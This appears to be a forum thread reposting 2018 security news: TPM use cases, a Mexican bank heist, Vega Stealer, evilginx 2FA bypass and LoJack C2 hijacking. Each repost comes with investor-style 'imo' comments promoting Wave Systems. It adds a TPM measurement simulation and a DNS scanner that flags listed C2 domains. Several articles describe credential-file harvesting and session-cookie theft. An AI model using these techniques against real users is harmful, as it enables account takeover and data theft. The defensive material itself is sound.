Check out @OnBoardSec new blog post on use cases in #trustedcomputing and how they can help you improve your system management - Twitter Trusted Computin.
http://blog.onboardsecurity.com/blog/trusted-computing-primary-use-cases?platform=hootsuite
Trusted Computing Primary Use Cases
There are four primary use cases for implementing trusted computing with a Trusted Platform Module (TPM), the cryptographic module standardized by the Trusted Computing Group. This blog will give a brief overview of those use cases, which can be combined to create more complex and powerful solutions.
HSM and Smart Card Replacement
The Public-Key Cryptography Standards (PKCS) #11 defines an API for cryptographic tokens, such as hardware security modules (HSM) and smart cards. A TPM is essentially a traditional HSM that can also emulate a smart card but adds functionality for measuring the software of a system. Applications using PKCS#11 today can use a TPM rather than a smartcard or HSM to perform the same functions, while providing additional functionality, like code measurement and remote attestation, often at a reduced cost.
Create a Transitive Trust Chain
A key part of the TPM’s trusted computing functionality is storing software measurements of the system, which is enabled by a bank of programmable configuration registers (PCRs).
During the system boot, the first program to run is an immutable “core root of trust for measurement” firmware component. It starts an unbroken chain of software measurements and security event logging. Measurements are made by hashing each block of code before it is launched, hash extending these measurements into the PCRs, and then recording these operations in the TCG Event log. These PCR values can then be used to do remote attestation, key sealing, authorization of key use, etc. These measurements assure that the system software has not been altered in any way, even protecting against rootkits and bootkits.
see link for infographic-
Enhance Performance with Sealed Keys
Many processors have cryptographic acceleration hardware (e.g. AES acceleration) that allows them to handle many cryptographic functions. But the keys are vulnerable to attacks if the system has been compromised. Key sealing allows keys protected by the TPM to be released to the main processor if the system is deemed to be healthy by verifying the system measurements.
Establish a Permanent Strong Device Identity
Public/private key pairs can be assigned to a system as a permanent ID when provisioned during manufacturing. When stored in a TPM as non-migratable keys, a “strong” identity (permanent secret) for the system is established. TPMs are required to be bound to the system, unlike their HSM counterparts. In practice, this means the TPM, which is soldered onto the system’s motherboard, can ensure that the system you are managing is an authorized part of your ecosystem.
Improve Your Overall System Management
Using the use cases above, backend servers and systems management can be designed/enhanced to fully capitalize on powerful TPM security features, including remote attestation, key/certificate provisioning, secure boot and more.
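The transitive trust chain and sealed-key use cases above both rest on the same mechanic: a PCR can only be extended, so the final PCR value commits to every measurement and the order in which they were made. The following is an added simulation (not OnBoard Security's or the TCG's code, and it talks to no real TPM) of a SHA-256 PCR bank, the verifier-side replay of a TCG-style event log, and a PCR-policy seal. The boot components, their digests and the allowlist are constructed sample values; the `PcrBank`, `SealedSecret` and helper names are assumptions of the example. It also goes slightly beyond the blog text by showing what a verifier gains from the event log: not just "the PCR changed" but which component changed.

```python
"""Simulation of TPM PCR hash-extend, event-log replay and PCR-gated key
sealing. Constructed example; it does not talk to a real TPM."""
import hashlib
from typing import Dict, List, Tuple

DIGEST_LEN = 32   # SHA-256 bank
PCR_COUNT = 24    # Platform Configuration Registers in a typical TPM 2.0 bank

# (pcr_index, digest, description): the fields a verifier needs from a log record.
Event = Tuple[int, bytes, str]


class PcrBank:
    """A SHA-256 PCR bank. PCRs reset to all zeros and can only be extended,
    never assigned, which is what makes the measurement chain tamper-evident."""

    def __init__(self) -> None:
        self.pcrs: List[bytes] = [bytes(DIGEST_LEN)] * PCR_COUNT
        self.event_log: List[Event] = []

    def extend(self, index: int, code: bytes, description: str) -> bytes:
        """Measure a code block: PCR[i] = SHA256(PCR[i] || SHA256(code)).
        The log records the digest that was extended, not the resulting PCR."""
        digest = hashlib.sha256(code).digest()
        self.pcrs[index] = hashlib.sha256(self.pcrs[index] + digest).digest()
        self.event_log.append((index, digest, description))
        return self.pcrs[index]


def measured_boot(components: List[Tuple[int, bytes, str]]) -> PcrBank:
    """Each stage measures the next before launching it (CRTM -> firmware -> loader -> kernel)."""
    bank = PcrBank()
    for index, code, description in components:
        bank.extend(index, code, description)
    return bank


def replay_event_log(event_log: List[Event]) -> Dict[int, bytes]:
    """Verifier side: rebuild the expected PCR values from the log alone."""
    expected: Dict[int, bytes] = {}
    for index, digest, _ in event_log:
        prev = expected.get(index, bytes(DIGEST_LEN))
        expected[index] = hashlib.sha256(prev + digest).digest()
    return expected


def log_consistent_with_pcrs(event_log: List[Event], pcrs: List[bytes]) -> bool:
    """A log that does not replay to the reported PCRs was edited after the fact."""
    return all(pcrs[i] == d for i, d in replay_event_log(event_log).items())


def unexpected_components(event_log: List[Event], allowlist: Dict[str, bytes]) -> List[str]:
    """Names of logged components whose digest the verifier does not recognise."""
    return [desc for _, digest, desc in event_log if allowlist.get(desc) != digest]


class SealedSecret:
    """Models key sealing under a PCR policy: the secret is released only while the
    named PCR holds the value it had at seal time."""

    def __init__(self, secret: bytes, pcr_index: int, bank: PcrBank) -> None:
        self._secret = secret
        self.pcr_index = pcr_index
        self.policy_value = bank.pcrs[pcr_index]

    def unseal(self, bank: PcrBank) -> bytes:
        if bank.pcrs[self.pcr_index] != self.policy_value:
            raise PermissionError("PCR policy check failed: system state differs from seal time")
        return self._secret


# Constructed sample boot chain. Real digests would come from the firmware and OS
# vendors or from a golden measurement taken at provisioning.
GOOD_CHAIN = [
    (0, b"CRTM+firmware v1.2", "firmware"),
    (4, b"bootloader v3", "bootloader"),
    (8, b"kernel 5.x", "kernel"),
]
ALLOWLIST = {desc: hashlib.sha256(code).digest() for _, code, desc in GOOD_CHAIN}

if __name__ == "__main__":
    good = measured_boot(GOOD_CHAIN)
    sealed = SealedSecret(b"disk-encryption-key", 8, good)
    print("log replays to PCRs:", log_consistent_with_pcrs(good.event_log, good.pcrs))
    print("unseal on healthy system:", sealed.unseal(good) == b"disk-encryption-key")
    # Swap the kernel for a modified one: PCR[8] changes, the log names it, unseal fails.
    bad = measured_boot(GOOD_CHAIN[:2] + [(8, b"kernel 5.x + bootkit", "kernel")])
    print("unrecognised components:", unexpected_components(bad.event_log, ALLOWLIST))
```

Two points the simulation makes visible: an attacker who alters a component cannot also edit the log into consistency, because the PCRs live inside the TPM and the forged log no longer replays to them; and extending the same measurements in a different order yields a different PCR, so the policy value pins the sequence, not just the set of components.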
Mexico’s Banking System Sees $18M Siphoned Off in Phantom Transactions
Why Wave's cybersecurity tools aren't benefiting the banking industry and other sectors in a big way seems a bit ludicrous. Marketing the many advantages of using the TPM and Wave's software vs. a software only solution seems to be something that is lacking and causing the market to miss this great technology. With only known devices allowed on the network and the use of Wave VSC 2.0, it would seem that this situation could have been averted. imo.
https://threatpost.com/mexicos-banking-system-sees-18m-siphoned-off-in-phantom-transactions/132004/
Somewhere between $18 million to $20 million has gone missing during unauthorized interbank money transfers in Mexico’s central banking system.
Authorities are investigating the shadow transactions, but answers are thus far scarce. The affected banks and government officials are determining whether the cash drainage, reported Monday, is the work of organized criminals mounting a cyberattack – or whether it could be an insider threat or even just human error.
Mario Di Costanzo, head of Mexico’s government commission on finance, said in a press statement that “the identity and recipients of some transactions made through the SPEI have not been identified.” SPEI is the country’s SWIFT-like centralized electronic payment system.
Beyond the official line though, unnamed sources have told Reuters this week that the funds were siphoned to fraudulent accounts in a coordinated heist that involved creating hundreds of phantom wires at several institutions; on-the-ground accomplices then took out the funds in the form of cash withdrawals at “dozens” of branch offices.
Anthony James, CMO at CipherCloud, told Threatpost in an interview that signs point to a sophisticated actor at play.
“The attackers had to penetrate the network and gather authentications. It would seem they were resident in the network for some period of time and likely watched network transactions, approval authority and more,” he said.
“This is a high-end attack and requires expensive and sophisticated cyber-attacker resources,” he noted. “This sort of attack, since it takes so much time to plan and execute, was most likely funded by organized crime as a targeted and directed attack. This is a full-time business for organized crime – they have funded a relentless and continual assault on financial institutions worldwide. Money transfer is the holy grail for them with large dollar amounts – almost the perfect and completely unattributable crime.”
If the investigation sources are correct and the perpetrators had mules in employ to take care of physical withdrawals at local bank branches, an obvious set of suspects comes to mind, according to Kenneth Geers, chief research scientist at Comodo Cybersecurity.
“The attack in Mexico appears to be domestic in nature, unlike the SWIFT manipulation in Bangladesh, which we believe was carried out from North Korea,” he told Threatpost. “As money and power become digitized, Mexican crime syndicates have no choice but to invest greater resources in computer hacking.”
He added, “I think that dozens of withdrawals from branch offices means that these are physical withdrawals by people, which would be much harder for an Asian or Russian gang to achieve remotely…[and], the historic power of Mexican cartels is destined, like everything else, to evolve and shift to cybercrime.”
Vulnerabilities at the Root
Lorenza Martinez, head of operations at the central bank (Banco de Mexico, or Banxico, for short), told Bloomberg that at least five financial institutions were found in late April to have vulnerabilities stemming from third-party software that individual banks were using. Those vulnerabilities, discovered after a suspected cyberattack disrupted some transfers, would allow the compromise of those banks’ external connections to the country’s centralized electronic payment system, SPEI.
After that revelation, Banxico asked member banks to up their security game by transitioning to an in-house, encrypted system—a migration which has sent some transactions grinding to a halt for consumers, including debit card charges, e-payments and ATM withdrawals. Even though at least 20 financial institutions have migrated to the new platform, cyberattacks have been ongoing, including one on a bank just last week, Martinez said. It’s unclear whether these attacks are related to the theft of the funds.
The incident points out the weak links that persist in the global financial system.
“Cybersecurity strategies based upon protecting the perimeter through sophisticated firewalls and endpoint defense alone are insufficient,” James said in the interview. “Recent news shows us that despite such formidable defenses, cyber-attackers are succeeding at an ever-increasing rate. Part of the problem with most financial institution networks is that they consider a user, once inside the network, to be trusted. That is, you have continual and unfettered access to network resources, traffic, you can move through the network laterally, and so on.”
Banxico said that it’s helping its bank partners to beef up their security postures, and is conducting a regulatory audit on banks’ security compliance levels. It also will require frequent stress tests in the future to ensure preparedness in the face of an attack.
The central bank in a statement (PDF) on Monday said that it’s asking members to “implement additional control measures aimed at strengthening their systems of detection of irregular transfers, verify the integrity of their operations and avoid possible adverse effects on financial institutions, to the rest of the [SPEI] participants and the system as a whole.”
President Trump signs executive order to elevate the role of agency CIOs
TPMs are nearly saturating all the computers in the government and turning them on along with Wave software could provide the U.S. government with much better security than what currently exists. Having CIOs empowered could help move along the use of this long overdue and better technology. imo.
https://www.fedscoop.com/trump-executive-order-cio-power/?utm_content=71495985&utm_medium=social&utm_source=twitter
President Donald Trump has signed an executive order that will elevate the role of agency CIOs.
The order, which was signed Tuesday afternoon, will require that agency CIOs report directly to the agency head. It will also make CIOs voting members of bureau-level IT governance boards in a bid to increase their enterprise awareness, and give them increased hiring powers.
“The true answer to modernizing government technology is to build the capacity to conduct change on an ongoing basis,” Jared Kushner, senior adviser to the president and head of the White House Office of American Innovation, said in a statement. “By ensuring that agency CIOs are empowered, today’s action by President Trump is a critical step forward in building that change management capacity.”
On a press call, senior administration officials said they were inspired to make this move after meeting with private sector tech CEOs at the White House last June. When they asked how these CEOs run their large enterprise organizations, officials said, one “glaring” difference between private sector and government was the empowerment of the CIO.
“President Trump is drawing on the best practices from the private sector and empowering CIOs to lead the technology transformation at their agencies,” Kushner said. “This executive order is a critical foundation to delivering a more efficient, effective and accountable government.”
Federal CIO Suzette Kent hinted at her desire to increase agency CIO authority at an event earlier this month.
“The accountability is there, but the second part of the equation is authority, and we’re still working on that,” she said at the time. “So when I say authority, I mean things like setting the technology direction, authority to hire skills that are needed, authority to manage the budget and the opportunity to sit at the table with agency and government leadership to collaborate and contribute on how we make decisions on how we are achieving mission.”
Giving CIOs more power, and then holding them accountable to this power, is a popular idea — and one that’s been around for a while.
The 2014 Federal Information Technology Reform Act (FITARA) was designed to give agency CIOs power over, and responsibility for, agency IT spending. It also pushes agencies to ensure that the CIO reports directly to the agency secretary or deputy secretary. However, only half of the agencies subject to FITARA have managed to make this happen.
Lawmakers have repeatedly expressed frustration with this reality. “One of the things that is still frustrating,” Rep. Will Hurd said during a hearing in March, “… is CIO authorities. We can’t hold CIOs accountable if we don’t give them all the power they need.”
Will this executive order move the needle? The White House seems to think that, at the very least, it can’t hurt.
“The fact that this is a presidential action is significant,” a senior administration official said.
This malware is harvesting saved credentials in Chrome, Firefox browsers
Wave Endpoint Monitor could stop this malware or Wave VSC 2.0 could keep important login credentials from being useful to a hacker. PIM use instead of the browser for storing credentials may help as well. imo.
https://www.zdnet.com/article/this-malware-is-harvesting-saved-credentials-in-chrome-firefox-browsers/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem%3A%20Trending%20Content&utm_content=5af9e74504d30179e6588d74&utm_medium=trueAnthem&utm_source=twitter
Researchers say the new Vega Stealer malware is currently being used in a simple campaign but has the potential to go much further.
Vega Stealer malware is at the heart of a new campaign designed to harvest saved financial data from Google Chrome and Firefox browsers.
While the new malware is only being utilized in simplistic and small phishing campaigns at the moment, researchers from Proofpoint say that Vega Stealer has the potential to become a common threat to businesses in the future.
Vega Stealer is a variant of August Stealer. Written in .NET, August Stealer locates and steals credentials, sensitive documents, and cryptocurrency wallet details from infected machines.
The new malware has a subset of the same functionality but has also been upgraded with an arsenal of expanded features, including a new network communication protocol and Firefox stealing functionality.
Vega Stealer is also written in .NET and focuses on the theft of saved credentials and payment information in Google Chrome. These credentials include passwords, saved credit cards, profiles, and cookies.
When the Firefox browser is in use, the malware harvests specific files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" -- which store various passwords and keys.
However, Vega Stealer does not wrap up there. The malware also takes a screenshot of the infected machine and scans for any files on the system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for exfiltration.
According to the security researchers, the malware is currently being utilized to target businesses in marketing, advertising, public relations, retail, and manufacturing.
The phishing campaign designed to propagate the malware, however, is not sophisticated. Emails are sent with subject lines such as "Online store developer required," and while some are targeted and sent to individuals at a business, most messages are sent to distribution lists including "publicaffairs@" and "clientservice@".
The email contains an attachment called "brief.doc" in which malicious macros download the Vega Stealer payload.
The payload is retrieved in two steps. The document first downloads an obfuscated JScript/PowerShell script which, once executed, creates a second request that pulls the executable payload of Vega Stealer from the threat actor's command-and-control (C&C) center.
This payload is then saved in the victim's "Music" directory with the name "ljoyoxu.pkzip." Once the executable is in place, Vega Stealer automatically executes via the command line in order to begin harvesting information.
Proofpoint believes that the document macro and URLs involved in the campaign may point towards the same threat actor responsible for campaigns spreading financial malware. However, such attribution is made tentatively.
"The document macro utilized in this campaign is a commodity macro that we believe is for sale and used by multiple actors, including the threat actor spreading Emotet banking Trojan," the researchers say. "However, the URL patterns from which the macro retrieves the payload are the same as those used by an actor we are tracking who distributes the Ursnif banking Trojan, which often downloads secondary payloads such as Nymaim, Gootkit, or IcedID. As a result, we attribute this campaign to the same actor with medium confidence."
Proofpoint says that it remains to be seen whether or not Vega Stealer is simply a tweaked version of August Stealer developed for this specific campaign. However, the team does believe that due to the sophisticated delivery mechanism, Vega Stealer has the potential to evolve into a common threat.
How to Secure Network Equipment Against Attacks
May 16 webcast - Learn how to secure network equipment #TPM root of trust against malware, physical attacks. Protect data, devices @Infineon @Cisco #Huawei @TrustedComputin
With network devices being secured, the TPM being enabled in computers could start to have a stronger impact. Securing network equipment could be the spark for enabling TPMs in all computers in a company's computer fleet with the help of marketing. imo.
— Trusted Computing (@TrustedComputin) May 11, 2018
CNI providers face hefty fines for cyber security failings
UK CNI providers should add Wave's products to their existing cybersecurity products for the most robust safeguards. imo. Wave's superior cybersecurity products could even replace some existing products. Better security at less than half the cost.
https://www.computerweekly.com/news/252440806/CNI-providers-face-hefty-fines-for-cyber-security-failings
UK providers of critical national infrastructure face hefty fines for cyber security failings from 10 May 2018
New UK laws implementing the EU directive on the security of network and information systems (NIS) goes into effect on 10 May 2018.
All organisations classified by the NIS Competent Authorities to be “operators of essential services” will be affected by new laws.
The new rules are aimed at ensuring the UK’s most critical industries boost cyber security and are backed by hefty fines for any organisation in the sector that fails to take adequate steps to protect itself from cyber attacks.
Energy, transport, water, health and other critical services firms could be fined up to £17m if they fail to have the most robust safeguards in place.
The new measures also cover other threats affecting IT, such as power outages, hardware failures and environmental hazards.
In 2017, the Department for Digital, Culture, Media and Sport (DCMS) ran a public consultation seeking views from industry on how to implement the NIS Directive.
Organisations that fall under the new rules are required to report cyber security incidents to the appointed competent authorities, who will assess whether appropriate security measures were in place.
The authorities will have the power to issue legally binding instructions to improve security and – if appropriate – impose financial penalties.
The UK’s National Cyber Security Centre (NCSC) is providing technical support and guidance to other government departments, devolved administrations, competent authorities and OES through a set of cyber security principles for securing essential services, a collection of supporting guidance and a Cyber Assessment Framework (CAF) incorporating indicators of good practice.
The NCSC is also providing implementation guidance and support to CAs to enable them to adapt the NIS principles for use in their sectors, undertake assessments using the CAF and interpret the results.
The NCSC will fulfil the role of a CSIRT (computer security incident response team) for the UK, as well as a single point of contact for engagement with EU partners on NIS, coordinating requests for action or information and submitting annual incident statistics, and function as the technical authority on cyber security for CAs and OES, but will have no regulatory role.
“The magnitude, frequency and impact of network and information system security incidents is increasing,” according to guidance published by the NCSC.
“Events such as the 2017 WannaCry ransomware attack, the 2016 attacks on US water utilities and the 2015 attack on Ukraine’s electricity network clearly highlight the impact that incidents can have,” the guidance said.
NIS Directive critical for essential services
Charlie Wedin, cyber security expert at international legal practice Osborne Clarke, said the NIS Directive will be critical to ensure essential services in the UK remain “on” during even the most extreme cyber attacks.
“In recent years, the number of cyber attacks against national infrastructure has risen dramatically, and this demonstrates just how attractive these systems have become to malicious actors looking to target any vulnerable points in the system.
“The consequences on society can be significant – preventing access to power, transport and emergency services. Recognising the importance of digital services in today's society, the directive also applies to online marketplaces, search engines and cloud storage.
“So, while the NIS Directive has been somewhat overshadowed by the General Data Protection Regulation, operators of essential services must ensure they are prepared to deal with both regulations,” he said.
Wedin suggests that organisations should test their security measures with realistic “war game” simulations to identify and rectify potential weaknesses proactively.
Iran likely to retaliate with cyberattacks after nuclear deal collapse
One could figure that with the potential exposure to U.S. companies from this article the support and sales lines at wavesys.com would be busy if Wave's superior cybersecurity were better advertised. I assume with those numbers publicly displayed on the site they are ready for action. imo.
https://www.zdnet.com/article/iran-poised-to-launch-cyberattacks-after-nuclear-deal-collapses/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem%3A%20Trending%20Content&utm_content=5af48c2f04d3016800de23da&utm_medium=trueAnthem&utm_source=twitter
Businesses in the US, Europe, and their allies — like Saudi Arabia and Israel — are also at risk of cyberattacks.
Iran is likely to respond with cyberattacks against Western businesses in response to the Trump administration's withdrawal from the nuclear deal, cybersecurity experts say.
Research out Wednesday suggests attacks could come "within months, if not faster," according to security firm Recorded Future.
The research paints a detailed picture of how Iran uses contractors and universities to staff its offensive cybersecurity operations -- or hacking efforts -- against foreign targets.
A former insider with knowledge of Iran's hacking operations said the attacks are likely to be launched by contractors and thus pose a greater risk of spinning out of control.
On Tuesday, President Donald Trump announced the US would withdraw from the Iran nuclear deal, a pact of Western nations that pledged to lift economic sanctions against Iran in exchange for limiting its nuclear program. The UN's nuclear verification agency said Iran had complied with the agreement.
Although there has been no evidence or intelligence to suggest a cyberattack is in the works, researchers say they predict, based on Iran's past cyber activities, that retaliatory cyberattacks are likely.
"We assess that within months, if not sooner, American companies in the financial, critical infrastructure, oil, and energy sectors will likely face aggressive and destructive cyberattacks by Iranian state-sponsored actors," said Priscilla Moriuchi, a former NSA analyst, now at Recorded Future.
"The Islamic Republic may utilize contractors that are less politically and ideologically reliable -- and trusted -- and as a result, could be more difficult to control," she said.
Countries allied with the US and Europe -- like Saudi Arabia and Israel -- are also at risk, the report said.
Levi Gundert, who co-authored the research, told ZDNet the attacks will likely aim for "maximum impact," such as a malware attack rather than a denial-of-service attack.
Much of the research is centered on Iran's long-known history of targeting Western businesses and governments with cyberattacks in response to sanctions, largely because of how quickly the hackers could turn around an attack.
Tehran began strengthening its cyber capabilities following the Green Revolution, a period of intense protests in Iran against the incumbent government during the Arab Spring in 2009.
The government responded with a heavy crackdown, with an increased focus on cyber operations.
Phishing Attack Bypasses Two-Factor Authentication
Some two factor authentication works better at less than half the cost.
https://www.darkreading.com/endpoint/phishing-attack-bypasses-two-factor-authentication/d/d-id/1331776
Hacker Kevin Mitnick demonstrates a phishing attack designed to abuse multi-factor authentication and take over targets' accounts.
Businesses and consumers around the world are encouraged to adopt two-factor authentication as a means of strengthening login security. But 2FA isn't ironclad: attackers are finding ways to circumvent the common best practice. In this case, they use social engineering.
A new exploit, demonstrated by KnowBe4 chief hacking officer Kevin Mitnick, lets threat actors access target accounts with a phishing attack. The tool to do this was originally developed by white hat hacker Kuba Gretzky, who dubbed it evilginx and explains it in a technical blog post.
It starts with typosquatting, a practice in which hackers create malicious URLs designed to look similar to websites people know. Mitnick starts his demo by opening a fake email from LinkedIn and points out its origin is "llnked.com" - a misspelling people will likely overlook.
Those who fall for the trick and click the email's malicious link are redirected to a login page where they enter their username, password, and eventually an authentication code sent to their mobile device. Meanwhile, the attacker can see a separate window where the victim's username, password, and a different six-digit code are displayed.
"This is not the actual 6-digit code that was intercepted, because you can't use the 6-digit code again," Mitnick says in the demo. "What we were able to do was intercept the session cookie."
With the session cookie, an attacker doesn't need a username, password, or second-factor code to access your account. They can simply enter the session key into the browser and act as you. All they have to do is paste the stolen session cookie into Developer Tools and hit Refresh.
It's not the first time 2FA has been hacked, says Stu Sjouwerman, founder and CEO at KnowBe4. "There are at least ten different ways to bypass two-factor authentication," he explains in an interview with Dark Reading. "They've been known about but they aren't necessarily well-published … most of them are flying under the radar."
These types of exploits are usually presented as concepts at conferences like Black Hat. Mitnick's demo puts code into context so people can see how it works. This can be used for any website but an attacker will need to tweak the code depending on how they want to use it.
To show how the exploit can make any site malicious, Sjouwerman sent me an email tailored to look like it came from Kelly Jackson Higgins, reporting a typo in an article of mine:
See link -
When I clicked the link, I ultimately ended up on Dark Reading but was first redirected to a site owned by the "attacker" (Sjouwerman). In a real attack scenario, I could have ended up on a truly malicious webpage where the hacker could launch several different attacks and attempt to take over my machine. Sjouwerman sent a screenshot of what he saw while this happened:
See link -
Event types go from processed, to deferred, to delivered, to opened.
"You need to be a fairly well-versed hacker to do this - to get it set up and have the code actually working," he notes. This is a one-on-one attack and can't be scaled to hit a large group of people at the same time. However, once the code works, the attack is fairly simple to pull off.
"You need to have user education and training, that's a no-brainer, but you also have to conduct simulated phishing attacks," Mitnick says in his demo.
Sjouwerman emphasizes the importance of putting employees through "new school" security awareness training, as opposed to the "death by PowerPoint" that many employees associate with this type of education. Instead of putting them through presentations, he recommends sending them phishing attacks and conducting online training in the browser.
Warren Buffett: Cybersecurity risk 'is uncharted territory. It’s going to get worse, not better'
Given that Warren Buffett knows Wave Systems as I recall, it would seem to make sense that having his cybersecurity insurance business make TPMs to be turned on 100% in a corporate fleet of computers mandatory for its customers to have its insurance. This could help stop unknown devices from getting on the network and starting a cyberattack. Wave's other products could help prevent other cyberattacks as well.
https://www.cnbc.com/2018/05/05/warren-buffett-cybersecurity-risk-is-uncharted-territory-its-going-to-get-worse-not-better.html
•Warren Buffett is concerned about the cybersecurity threat to the insurance industry.
•"Cyber is uncharted territory. It's going to get worse, not better," he said at the Berkshire Hathaway 2018 Annual Shareholders Meeting Saturday.
Warren Buffett believes cybersecurity incidents will rise, and with it the potential to significantly harm the insurance industry.
"Cyber is uncharted territory. It's going to get worse, not better," he said at the Berkshire Hathaway 2018 Annual Shareholders Meeting Saturday. "There's a very material risk which didn't exist 10 or 15 years ago and will be much more intense as the years go along."
Buffett said he doesn't want much underwriting exposure to cybersecurity threats for Berkshire's insurance businesses. He noted the company has a "pretty good idea" on how to properly assess the probabilities for earthquakes in California and hurricanes in Florida, but not with computer hacking threats.
The investor expressed skepticism that any insurance company can assess the risk for cybersecurity events.
"We don't want to be a pioneer on this ... I think anybody that tells you now they think they know in some actuarial way either what [the] general experience is like in the future, or what the worst case can be, is kidding themselves," he added.
LoJack Attack Finds False C2 Servers
EX05 looks like the go to solution after reading this article.
https://www.darkreading.com/attacks-breaches/lojack-attack-finds-false-c2-servers/d/d-id/1331691
A new attack uses compromised LoJack endpoint software to take root on enterprise networks.
Researchers have identified a new attack that uses computer-recovery tool LoJack as a vehicle for breaching a company's defenses and remaining persistent on the network. The good news is that it hasn't started specific malicious activity — yet.
Arbor Networks' ASERT, acting on a third-party tip, found a subtle hack involving legitimate LoJack endpoint agents. The threat actors didn't change any of the legitimate actions of the software. All they did was strip out the legitimate C2 (command and control) server address from the system and replace it with a C2 server of their own.
Richard Hummel, manager of threat research at NETSCOUT Arbor's ASERT, says that the subtlety of the action means that most existing security software and systems will not provide any indication that something is going wrong. "If they're running as an admin, they might not see it," Hummel says. "This doesn't identify as malicious or malware, so they might just see a subtle warning."
The addresses of the new C2 servers are among the pieces of analysis that led researchers to attribute the campaign to Fancy Bear, a Russian hacking group responsible for a number of well-known exploits. On initial execution, the infected software contacts one of the C2 servers, which logs its success. Then the new LoJack application proceeds to … wait. It simply does what LoJack does, with no additional communication or activity.
Hummel says that the lack of activity and lack of steps to prevent legitimate activity means that most security software won't recognize that the app is anything but legitimate.
Once in place, the nature of the LoJack system's activities means that it's very persistent, remaining in place and active through reboots, on/off cycles, and other disruptive events.
"This is basically giving the attacker a foothold in an agency," Hummel says. "There's no LoJack execution of files, but they could launch additional software at a later date." And the foothold that the software gains is a strong one.
"If they're on a critical system or the user is someone with high privileges, then they have a direct line into the enterprise," Hummel explains, adding, "with the permissions that LoJack requires, [the attackers] have permission to install whatever they want on the victims' machines."
There is, so far, nothing about the attack that contains a huge element of novelty. As for the code, Hummel says that this particular mechanism for attack has been around since 2014, when the software that is now LoJack was called Computrace. Even then, Hummel says, "researchers talked about how LoJack maintains its persistence."
And while Hummel's team has suspicions about infection mechanisms, they aren't yet sure what's happening. "We did some initial analysis on how the payload is being distributed and other Fancy Bear attacks, and we can't verify the infection chain," Hummel says, though he's quick to add, "We don't think that LoJack is distributing bad software."
With stealth and persistence on its side, how does an enterprise prevent this new attack from placing bad software on corporate computers? Hummel says everything begins with proper computer hygiene. "Users will be prompted for permission warnings — don't just blow by them," he says.
Next, the IT security team can scan for five domains currently used by the software:
• elaxo[.]org
• ikmtrust[.]com
• lxwo[.]org
• sysanalyticweb[.]com (2 forms)
Each of these domains should be blocked by network security mechanisms.
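A network-side check for the indicators listed above, written here as an added example (it is not part of the Dark Reading article or of ASERT's tooling). It refangs the defanged domains, matches exact host names and anything under them (which covers both forms of sysanalyticweb[.]com), and runs over a few constructed DNS query log lines; the log layout, the timestamps and the client addresses are assumptions.

```python
"""Match DNS query logs against the LoJack C2 indicators published above.

Added example. The log format (timestamp client qname) and every sample
line below are constructed for illustration.
"""
from typing import Dict, List, Optional

# Indicators exactly as published, defanged with [.] so they are not clickable.
LOJACK_C2_IOCS = [
    "elaxo[.]org",
    "ikmtrust[.]com",
    "lxwo[.]org",
    "sysanalyticweb[.]com",
]


def refang(domain: str) -> str:
    """Turn a defanged indicator back into a normalised host name."""
    return domain.replace("[.]", ".").strip().lower().rstrip(".")


def match_ioc(qname: str, iocs: List[str]) -> Optional[str]:
    """Return the indicator a queried name matches, or None.

    A match is the indicator itself or any label under it; the leading dot in
    the suffix test keeps a look-alike such as 'notelaxo.org' from matching.
    """
    host = qname.strip().lower().rstrip(".")
    for ioc in iocs:
        bad = refang(ioc)
        if host == bad or host.endswith("." + bad):
            return ioc
    return None


def scan_dns_log(log_text: str, iocs: List[str] = LOJACK_C2_IOCS) -> List[Dict]:
    """Scan whitespace-separated 'timestamp client qname' lines; return the hits."""
    hits = []
    for line in log_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 3:
            continue
        ts, client, qname = fields[0], fields[1], fields[2]
        ioc = match_ioc(qname, iocs)
        if ioc is not None:
            hits.append({"time": ts, "client": client, "qname": qname, "ioc": ioc})
    return hits


# Constructed sample log: two true positives and one look-alike that must not match.
SAMPLE_DNS_LOG = """\
# time                 client      qname
2018-05-02T03:14:07Z   10.1.4.22   time.windows.com
2018-05-02T03:14:09Z   10.1.4.22   www.sysanalyticweb.com
2018-05-02T03:20:41Z   10.1.9.5    elaxo.org
2018-05-02T03:21:02Z   10.1.9.5    notelaxo.org
"""

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{hit['time']} {hit['client']} queried {hit['qname']} (matches {hit['ioc']})")
```

The same suffix rule is what a resolver or proxy block list should apply; keep the published list defanged in tickets and documentation and only refang it inside the tool that consumes it.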
It's rare to have warning of an active infection method prior to damaging attacks using the infection target. Organizations now have time to learn about the tactic and disinfect compromised endpoints before the worst occurs.
The best antivirus? Kaspersky leads in latest tests, but that's only part of the story
After reading an article like this, it would seem logical that Wave Endpoint Monitor would have a good slice of the pie.
https://www.csoonline.com/article/3215866/endpoint-protection/the-best-enterprise-antivirus-kaspersky-leads-in-latest-tests.html#tk.twt_cso
Ransomware and other threats often get through signature-based antivirus protection, giving it a bad rap. However, antivirus tools still play an important role in the enterprise security strategy.
The AV-TEST Institute recently tested the most popular Windows 10 client antivirus products on three primary criteria: protection, performance, and usability. Products that ranked highest in all three areas were Kaspersky Lab Endpoint Security 10.3 and Small Office Security 5, Symantec Endpoint Protection 14.0 and Endpoint Protection Cloud 22.11, and Trend Micro Office Scan 12.
The downloadable infographic below summarizes the results. You can drill down on the full results at The AV-TEST Institute's website.
Why the best antivirus software may not be enough
Traditional signature-based antivirus is notoriously bad at stopping newer threats such as zero-day malware and ransomware, but it still has a place in the enterprise, experts say, as part of a multi-layer endpoint security protection strategy. The best antivirus products act as the first layer of defense, stopping the vast majority of malware attacks and leaving the broader endpoint protection software with a smaller load to deal with.
According to a survey of this year's Black Hat attendees, 73 percent think that traditional antivirus is irrelevant or obsolete. "The perception of the blocking or protection capabilities of antivirus has certainly declined," says Mike Spanbauer, vice president of strategy and research at NSS Labs, Inc.
Plenty of recent research supports that point of view. In December 2017, security company WatchGuard Technologies reported the results of a comprehensive test of traditional antivirus. They calculated how well a leading traditional antivirus product did at spotting zero-day threats by looking at customers who had both traditional antivirus and next-generation endpoint protection products installed. Traditional antivirus caught 9,861,318 malware variants, but it missed 3,074,534 others that were caught by a next-generation platform that used a behavior-based approach. That's a failure rate of about 24 percent.
The traditional antivirus product was from AVG Technologies, a well-reviewed product. In fact, in a report released in late 2017 by AV Comparatives, AVG caught 99.6 percent of the samples tested, making it one of the top ten products on the market.
